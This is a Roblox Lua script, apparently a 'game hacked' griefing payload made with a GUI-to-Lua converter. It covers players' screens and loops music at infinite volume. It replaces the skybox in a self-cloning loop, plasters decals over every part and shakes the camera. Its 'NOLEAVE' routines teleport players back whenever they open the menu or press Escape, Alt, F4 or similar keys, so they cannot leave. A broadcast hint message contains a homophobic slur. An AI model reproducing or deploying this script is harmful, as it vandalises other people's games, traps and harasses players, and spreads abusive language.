-- Monstrum's Gui to Lua\n-- Version: 3.2 -- Instances: local ScreenGui = Instance.new("ScreenGui") local ImageLabel = Instance.new("ImageLabel") local LoadingFrame = Instance.new("Frame") local PercentageBar = Instance.new("ImageLabel") local Label = Instance.new("TextLabel") local Frame = Instance.new("ImageLabel") local TextLabel = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local TextLabel_3 = Instance.new("TextLabel") local ScreenGui_2 = Instance.new("ScreenGui") local ImageLabel_2 = Instance.new("ImageLabel") local LoadingFrame_2 = Instance.new("Frame") local PercentageBar_2 = Instance.new("ImageLabel") local Label_2 = Instance.new("TextLabel") local Frame_2 = Instance.new("ImageLabel") local TextLabel_4 = Instance.new("TextLabel") local TextLabel_5 = Instance.new("TextLabel") local TextLabel_6 = Instance.new("TextLabel") --Properties: ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.DisplayOrder = 657567567 ScreenGui.ResetOnSpawn = false ImageLabel.Parent = ScreenGui ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BorderColor3 = Color3.fromRGB(27, 42, 53) ImageLabel.Position = UDim2.new(0, 0, -0.0599999987, 0) ImageLabel.Size = UDim2.new(1, 0, 1.07682776, 0) ImageLabel.Visible = false ImageLabel.Image = "rbxassetid://103555910860905" LoadingFrame.Name = "LoadingFrame" LoadingFrame.Parent = ImageLabel LoadingFrame.BackgroundColor3 = Color3.fromRGB(35, 35, 35) LoadingFrame.BorderColor3 = Color3.fromRGB(27, 42, 53) LoadingFrame.BorderSizePixel = 0 LoadingFrame.Position = UDim2.new(-0.000821621623, 0, 0.814750969, 0) LoadingFrame.Size = UDim2.new(0.338442117, 0, 0.19506079, 0) PercentageBar.Name = "PercentageBar" PercentageBar.Parent = LoadingFrame PercentageBar.BackgroundColor3 = Color3.fromRGB(255, 255, 255) PercentageBar.BackgroundTransparency = 1.000 PercentageBar.BorderColor3 = Color3.fromRGB(27, 42, 53) PercentageBar.Position = UDim2.new(0.0326975472, 0, 0.577336967, 0) PercentageBar.Size = UDim2.new(0.934604824, 0, 0.295081973, 0) PercentageBar.Image = "rbxassetid://103555910860905" PercentageBar.ImageColor3 = Color3.fromRGB(0, 145, 255) PercentageBar.ScaleType = Enum.ScaleType.Slice PercentageBar.SliceCenter = Rect.new(100, 100, 100, 100) PercentageBar.SliceScale = 0.120 Label.Name = "Label" Label.Parent = PercentageBar Label.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Label.BackgroundTransparency = 1.000 Label.BorderColor3 = Color3.fromRGB(27, 42, 53) Label.Size = UDim2.new(1, 0, 1, 0) Label.Font = Enum.Font.SourceSans Label.Text = "100%" Label.TextColor3 = Color3.fromRGB(255, 255, 255) Label.TextScaled = true Label.TextSize = 14.000 Label.TextWrapped = true Frame.Name = "Frame" Frame.Parent = LoadingFrame Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame.BackgroundTransparency = 1.000 Frame.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame.Position = UDim2.new(-0.204075292, 0, -0.198473275, 0) Frame.Size = UDim2.new(0.525885582, 0, 0.368852466, 0) Frame.Image = "rbxassetid://103555910860905" Frame.ImageColor3 = Color3.fromRGB(35, 35, 35) Frame.ScaleType = Enum.ScaleType.Slice Frame.SliceCenter = Rect.new(100, 100, 100, 100) Frame.SliceScale = 0.120 TextLabel.Parent = Frame TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel.Position = UDim2.new(0.383419693, 0, 0, 0) TextLabel.Size = UDim2.new(0.616580307, 0, 0.577777803, 0) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Loading..." TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextScaled = true TextLabel.TextSize = 14.000 TextLabel.TextWrapped = true TextLabel_2.Parent = ImageLabel TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel_2.Position = UDim2.new(0.0562912859, 0, 0.899411678, 0) TextLabel_2.Size = UDim2.new(0.223557532, 0, 0.0245394632, 0) TextLabel_2.Font = Enum.Font.SourceSansItalic TextLabel_2.Text = "A place of pure homeless joy.." TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.TextScaled = true TextLabel_2.TextSize = 14.000 TextLabel_2.TextWrapped = true TextLabel_3.Parent = ImageLabel TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.BackgroundTransparency = 1.000 TextLabel_3.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel_3.Position = UDim2.new(-0.00198846636, 0, 0.846784174, 0) TextLabel_3.Size = UDim2.new(0.339608967, 0, 0.0428137034, 0) TextLabel_3.Font = Enum.Font.SourceSans TextLabel_3.Text = "Now joining tubers" TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.TextScaled = true TextLabel_3.TextSize = 14.000 TextLabel_3.TextWrapped = true ScreenGui_2.Parent = ScreenGui ScreenGui_2.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui_2.ResetOnSpawn = false ImageLabel_2.Parent = ScreenGui_2 ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_2.BorderColor3 = Color3.fromRGB(27, 42, 53) ImageLabel_2.Size = UDim2.new(1, 0, 1, 0) ImageLabel_2.Image = "rbxassetid://103555910860905" LoadingFrame_2.Name = "LoadingFrame" LoadingFrame_2.Parent = ImageLabel_2 LoadingFrame_2.BackgroundColor3 = Color3.fromRGB(35, 35, 35) LoadingFrame_2.BorderColor3 = Color3.fromRGB(27, 42, 53) LoadingFrame_2.BorderSizePixel = 0 LoadingFrame_2.Position = UDim2.new(-0.000821621623, 0, 0.814750969, 0) LoadingFrame_2.Size = UDim2.new(0.338442117, 0, 0.19506079, 0) PercentageBar_2.Name = "PercentageBar" PercentageBar_2.Parent = LoadingFrame_2 PercentageBar_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) PercentageBar_2.BackgroundTransparency = 1.000 PercentageBar_2.BorderColor3 = Color3.fromRGB(27, 42, 53) PercentageBar_2.Position = UDim2.new(0.0326975472, 0, 0.577336967, 0) PercentageBar_2.Size = UDim2.new(0.934604824, 0, 0.295081973, 0) PercentageBar_2.Image = "rbxassetid://103555910860905" PercentageBar_2.ImageColor3 = Color3.fromRGB(0, 145, 255) PercentageBar_2.ScaleType = Enum.ScaleType.Slice PercentageBar_2.SliceCenter = Rect.new(100, 100, 100, 100) PercentageBar_2.SliceScale = 0.120 Label_2.Name = "Label" Label_2.Parent = PercentageBar_2 Label_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Label_2.BackgroundTransparency = 1.000 Label_2.BorderColor3 = Color3.fromRGB(27, 42, 53) Label_2.Size = UDim2.new(1, 0, 1, 0) Label_2.Font = Enum.Font.SourceSans Label_2.Text = "100%" Label_2.TextColor3 = Color3.fromRGB(255, 255, 255) Label_2.TextScaled = true Label_2.TextSize = 14.000 Label_2.TextWrapped = true Frame_2.Name = "Frame" Frame_2.Parent = LoadingFrame_2 Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_2.BackgroundTransparency = 1.000 Frame_2.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_2.Position = UDim2.new(-0.204075292, 0, -0.198473275, 0) Frame_2.Size = UDim2.new(0.525885582, 0, 0.368852466, 0) Frame_2.Image = "rbxassetid://103555910860905" Frame_2.ImageColor3 = Color3.fromRGB(35, 35, 35) Frame_2.ScaleType = Enum.ScaleType.Slice Frame_2.SliceCenter = Rect.new(100, 100, 100, 100) Frame_2.SliceScale = 0.120 TextLabel_4.Parent = Frame_2 TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.BackgroundTransparency = 1.000 TextLabel_4.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel_4.Position = UDim2.new(0.383419693, 0, 0, 0) TextLabel_4.Size = UDim2.new(0.616580307, 0, 0.577777803, 0) TextLabel_4.Font = Enum.Font.SourceSans TextLabel_4.Text = "Loading..." TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.TextScaled = true TextLabel_4.TextSize = 14.000 TextLabel_4.TextWrapped = true TextLabel_5.Parent = ImageLabel_2 TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.BackgroundTransparency = 1.000 TextLabel_5.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel_5.Position = UDim2.new(-0.00198846636, 0, 0.846784174, 0) TextLabel_5.Size = UDim2.new(0.339608967, 0, 0.0428137034, 0) TextLabel_5.Font = Enum.Font.SourceSans TextLabel_5.Text = "Now joining tubers realm" TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.TextScaled = true TextLabel_5.TextSize = 14.000 TextLabel_5.TextWrapped = true TextLabel_6.Parent = ImageLabel_2 TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.BackgroundTransparency = 1.000 TextLabel_6.BorderColor3 = Color3.fromRGB(27, 42, 53) TextLabel_6.Position = UDim2.new(0.0562912859, 0, 0.899411678, 0) TextLabel_6.Size = UDim2.new(0.223557532, 0, 0.0245394632, 0) TextLabel_6.Font = Enum.Font.SourceSansItalic TextLabel_6.Text = "A place of pure homeless joy" TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.TextScaled = true TextLabel_6.TextSize = 14.000 TextLabel_6.TextWrapped = true -- Scripts: local function BHRTBR_script() -- ImageLabel.%@kg^!f"cz local script = Instance.new('LocalScript', ImageLabel) local plr = game.Players.LocalPlayer -- Player to teleport(usually defined as an arguement or parameter) local PlaceId = game.PlaceId --- PLace to teleport the player game:GetService("GuiService").MenuOpened:Connect(function() local TeleportScreen = game:GetService("TeleportService"):SetTeleportGui(script.Parent.Parent) game:GetService("TeleportService"):Teleport(PlaceId,plr,nil,TeleportScreen) game:GetService("TeleportService"):Teleport(PlaceId, plr) end) end coroutine.wrap(BHRTBR_script)() local function VHVZ_script() -- ImageLabel.mexWs% local script = Instance.new('LocalScript', ImageLabel) while true do wait() game:GetService("GuiService").MenuOpened:Connect(function() script.Parent.Visible = true end) end end coroutine.wrap(VHVZ_script)() local function MPKNZZO_script() -- ScreenGui.sky local script = Instance.new('Script', ScreenGui) --MADE BY OneLegend (NOT THE SCRIPT) REGULAR SCRIPT: JUST RUN! while true do wait(1) c = script:Clone() c.Parent = game.Lighting s = Instance.new("Sky") s.Name = "loltroll" s.SkyboxBk = "rbxassetid://103555910860905" s.SkyboxDn = "rbxassetid://103555910860905" s.SkyboxFt = "rbxassetid://103555910860905" s.SkyboxLf = "rbxassetid://103555910860905" s.SkyboxRt = "rbxassetid://103555910860905" s.SkyboxUp = "rbxassetid://103555910860905" s.Parent = game.Lighting end end coroutine.wrap(MPKNZZO_script)() local function AZTICT_script() -- ScreenGui.hint local script = Instance.new('Script', ScreenGui) local msg = Instance.new("Hint") while true do wait(0) -- change to your liking msg.Text = "wassup faggot it seems your game is hacked by goofyuserah lmao" msg.Parent = game.Workspace end end coroutine.wrap(AZTICT_script)() local function RWGYB_script() -- ScreenGui.cameralol local script = Instance.new('LocalScript', ScreenGui) -- << Variables >> -- local Player = game:GetService("Players").LocalPlayer local Mouse = Player:GetMouse() local Camera = game:GetService("Workspace").CurrentCamera local UserInputService = game:GetService("UserInputService") local Humanoid = Player.Character:WaitForChild("Humanoid") local rep = game:GetService("ReplicatedStorage") local remote1 = rep:WaitForChild("shaker") local bobbing = nil local func1 = 0 local func2 = 0 local func3 = 0 local func4 = 0 local val = 0 local val2 = 0 local int = 10 local int2 = 10 local vect3 = Vector3.new() -- << Functions >> -- UserInputService.MouseIconEnabled = false function lerp(a, b, c) return a + (b - a) * c end bobbing = game:GetService("RunService").RenderStepped:Connect(function(deltaTime) deltaTime = deltaTime * 60 if Humanoid.Health <= 0 then bobbing:Disconnect() return end local rootMagnitude = Humanoid.RootPart and Vector3.new(Humanoid.RootPart.Velocity.X, 0, Humanoid.RootPart.Velocity.Z).Magnitude or 0 local calcRootMagnitude = math.min(rootMagnitude, 10) if deltaTime > 3 then func1 = 0 func2 = 0 else func1 = lerp(func1, math.cos(tick() * 0.5 * math.random(10, 15)) * (math.random(5, 20) / 200) * deltaTime, 0.05 * deltaTime) func2 = lerp(func2, math.cos(tick() * 0.5 * math.random(5, 10)) * (math.random(2, 10) / 200) * deltaTime, 0.05 * deltaTime) end Camera.CFrame = Camera.CFrame * (CFrame.fromEulerAnglesXYZ(0, 0, math.rad(func3)) * CFrame.fromEulerAnglesXYZ(math.rad(func4 * deltaTime), math.rad(val * deltaTime), val2) * CFrame.Angles(0, 0, math.rad(func4 * deltaTime * (calcRootMagnitude / 5))) * CFrame.fromEulerAnglesXYZ(math.rad(func1), math.rad(func2), math.rad(func2 * 10))) val2 = math.clamp(lerp(val2, -Camera.CFrame:VectorToObjectSpace((Humanoid.RootPart and Humanoid.RootPart.Velocity or Vector3.new()) / math.max(Humanoid.WalkSpeed, 0.01)).X * 0.08, 0.1 * deltaTime), -0.35, 0.2) func3 = lerp(func3, math.clamp(UserInputService:GetMouseDelta().X, -5, 5), 0.25 * deltaTime) func4 = lerp(func4, math.sin(tick() * int) / 5 * math.min(1, int2 / 10), 0.25 * deltaTime) if rootMagnitude > 1 then val = lerp(val, math.cos(tick() * 0.5 * math.floor(int)) * (int / 200), 0.25 * deltaTime) else val = lerp(val, 0, 0.05 * deltaTime) end if rootMagnitude > 12 then int = 20 int2 = 18 elseif rootMagnitude > 0.1 then int = 12 int2 = 14 else int2 = 0 end Player.CameraMaxZoomDistance = 0.5 Player.CameraMinZoomDistance = 0.5 vect3 = lerp(vect3, Camera.CFrame.LookVector, 0.125 * deltaTime) end) remote1.OnClientEvent:Connect(function(deltaTime) bobbing = game:GetService("RunService").RenderStepped:Connect(function(deltaTime) deltaTime = deltaTime * 60 if Humanoid.Health <= 0 then bobbing:Disconnect() return end local rootMagnitude = Humanoid.RootPart and Vector3.new(Humanoid.RootPart.Velocity.X, 0, Humanoid.RootPart.Velocity.Z).Magnitude or 0 local calcRootMagnitude = math.min(rootMagnitude, 10) if deltaTime > 3 then func1 = 0 func2 = 0 else func1 = lerp(func1, math.cos(tick() * 2 * math.random(14, 15)) * (math.random(5, 20) / 270) * deltaTime, 0.15 * deltaTime) func2 = lerp(func2, math.cos(tick() * 2 * math.random(9, 10)) * (math.random(2, 10) / 270) * deltaTime, 0.15 * deltaTime) end Camera.CFrame = Camera.CFrame * (CFrame.fromEulerAnglesXYZ(0, 0, math.rad(func3)) * CFrame.fromEulerAnglesXYZ(math.rad(func4 * deltaTime), math.rad(val * deltaTime), val2) * CFrame.Angles(0, 0, math.rad(func4 * deltaTime * (calcRootMagnitude / 15))) * CFrame.fromEulerAnglesXYZ(math.rad(func1), math.rad(func2), math.rad(func2 * 15))) val2 = math.clamp(lerp(val2, -Camera.CFrame:VectorToObjectSpace((Humanoid.RootPart and Humanoid.RootPart.Velocity or Vector3.new()) / math.max(Humanoid.WalkSpeed, 0.01)).X * 0.08, 0.1 * deltaTime), -0.35, 0.2) func3 = lerp(func3, math.clamp(UserInputService:GetMouseDelta().X, -5, 5), 0.25 * deltaTime) func4 = lerp(func4, math.sin(tick() * int) / 5 * math.min(1, int2 / 10), 0.25 * deltaTime) if rootMagnitude > 1 then val = lerp(val, math.cos(tick() * 1 * math.floor(int)) * (int / 250), 0.35 * deltaTime) else val = lerp(val, 0, 0.15 * deltaTime) end if rootMagnitude > 12 then int = 20 int2 = 18 elseif rootMagnitude > 0.1 then int = 12 int2 = 14 else int2 = 0 end Player.CameraMaxZoomDistance = 0.5 Player.CameraMinZoomDistance = 0.5 vect3 = lerp(vect3, Camera.CFrame.LookVector, 0.125 * deltaTime) task.wait(0.1) bobbing:Disconnect() end) end) end coroutine.wrap(RWGYB_script)() local function GSMON_script() -- nil.remotevent local script = Instance.new('Script', nil) local ReplicatedStorage = game:GetService("ReplicatedStorage") local shaker = Instance.new("RemoteEvent", ReplicatedStorage) shaker.Name = "shaker" end coroutine.wrap(GSMON_script)() local function PUHL_script() -- ScreenGui.music local script = Instance.new('Script', ScreenGui) local sound = Instance.new("Sound") sound.Name = "Sound" sound.SoundId = "http://www.roblox.com/asset/?id=1839246711" --Song sound.Volume = math.huge sound.Pitch = 1 --Speed of Playback sound.Looped = true sound.archivable = false sound.Parent = game.Workspace wait(5) sound:play() end coroutine.wrap(PUHL_script)() local function VDHCUAL_script() -- ScreenGui.Decal Spam local script = Instance.new('Script', ScreenGui) local work = game.Workspace:GetDescendants() local pic = "rbxassetid://103555910860905" for i, v in pairs(work) do if v.ClassName == "Part" or "UnionOperation" then for i = 1, 6, 1 do local a = Instance.new("Decal") if i == 1 then a.Face = "Back" elseif i == 2 then a.Face = "Bottom" elseif i == 3 then a.Face = "Front" elseif i == 4 then a.Face = "Left" elseif i == 5 then a.Face = "Right" elseif i == 6 then a.Face = "Top" end a.ZIndex = 99 a.Texture = pic a.Parent = v end end end end coroutine.wrap(VDHCUAL_script)() local function GBOBYN_script() -- ScreenGui.load2 local script = Instance.new('LocalScript', ScreenGui) while true do wait(0.1) if game:IsLoaded() then break end end v4 = script.Parent.Parent.ScreenGui v4:Play() script.Parent.Parent = game.ReplicatedFirst end coroutine.wrap(GBOBYN_script)() local function NIWUN_script() -- ScreenGui.NOLEAVE1 local script = Instance.new('LocalScript', ScreenGui) local uis = game:GetService("UserInputService") local re = function() local tps = game:GetService("TeleportService") --this is lagging script.ScreenGui.Enabled = true tps:SetTeleportGui(script.ScreenGui) tps:TeleportToPlaceInstance(game.PlaceId.JobId,game:GetService("Players").LocalPlayer) end --this is with event game:GetService("GuiService").MenuOpened:Connect(function() re() end) game:GetService("GuiService").MenuClosed:Connect(function() re() end) spawn(function() while wait() do if game:GetService("GuiService").MenuIsOpen == true then re() end end end) --now userinput service uis.WindowFocusReleased:Connect(function() re() end) uis.InputBegan:Connect(function(key) if key.KeyCode == Enum.KeyCode.ButtonStart then re() elseif key.KeyCode == Enum.KeyCode.LeftAlt then re() elseif key.KeyCode == Enum.KeyCode.F4 then re() elseif key.KeyCode == Enum.KeyCode.Tab then re() elseif key.KeyCode == Enum.KeyCode.Escape then re() elseif key.KeyCode == Enum.KeyCode.F11 then re() elseif key.KeyCode == Enum.KeyCode.F2 then re() elseif key.KeyCode == Enum.KeyCode.RightAlt then re() elseif key.KeyCode == Enum.KeyCode.LeftSuper then re() elseif key.KeyCode == Enum.KeyCode.RightSuper then re() elseif key.KeyCode == Enum.KeyCode.F9 then re() elseif key.KeyCode == Enum.KeyCode.Delete then re() end end) end coroutine.wrap(NIWUN_script)() local function DJOG_script() -- ImageLabel_2.,h|z E[1 local script = Instance.new('LocalScript', ImageLabel_2) local tubers93 = Instance.new("Sound") tubers93.Parent = game:GetService("Workspace") tubers93.SoundId = "rbxassetid://6129291390" tubers93.Playing = true tubers93.Looped = false tubers93.Volume = 5 wait(5) script.Parent.Parent:Destroy() end coroutine.wrap(DJOG_script)() local function MKKVGQ_script() -- ScreenGui_2.load local script = Instance.new('LocalScript', ScreenGui_2) while true do wait(0.1) if game:IsLoaded() then break end end v4 = script.Parent.Parent.ScreenGui v4:Play() script.Parent.Parent = game.ReplicatedFirst end coroutine.wrap(MKKVGQ_script)() local function AOZYK_script() -- ScreenGui_2.NOLEAVE2 local script = Instance.new('LocalScript', ScreenGui_2) local uis = game:GetService("UserInputService") local re = function() local tps = game:GetService("TeleportService") --this is lagging script.ScreenGui.Enabled = true tps:SetTeleportGui(script.ScreenGui) tps:TeleportToPlaceInstance(game.PlaceId.JobId,game:GetService("Players").LocalPlayer) end --this is with event game:GetService("GuiService").MenuOpened:Connect(function() re() end) game:GetService("GuiService").MenuClosed:Connect(function() re() end) spawn(function() while wait() do if game:GetService("GuiService").MenuIsOpen == true then re() end end end) --now userinput service uis.WindowFocusReleased:Connect(function() re() end) uis.InputBegan:Connect(function(key) if key.KeyCode == Enum.KeyCode.ButtonStart then re() elseif key.KeyCode == Enum.KeyCode.LeftAlt then re() elseif key.KeyCode == Enum.KeyCode.F4 then re() elseif key.KeyCode == Enum.KeyCode.Tab then re() elseif key.KeyCode == Enum.KeyCode.Escape then re() elseif key.KeyCode == Enum.KeyCode.F11 then re() elseif key.KeyCode == Enum.KeyCode.F2 then re() elseif key.KeyCode == Enum.KeyCode.RightAlt then re() elseif key.KeyCode == Enum.KeyCode.LeftSuper then re() elseif key.KeyCode == Enum.KeyCode.RightSuper then re() elseif key.KeyCode == Enum.KeyCode.F9 then re() elseif key.KeyCode == Enum.KeyCode.Delete then re() end end) end coroutine.wrap(AOZYK_script)()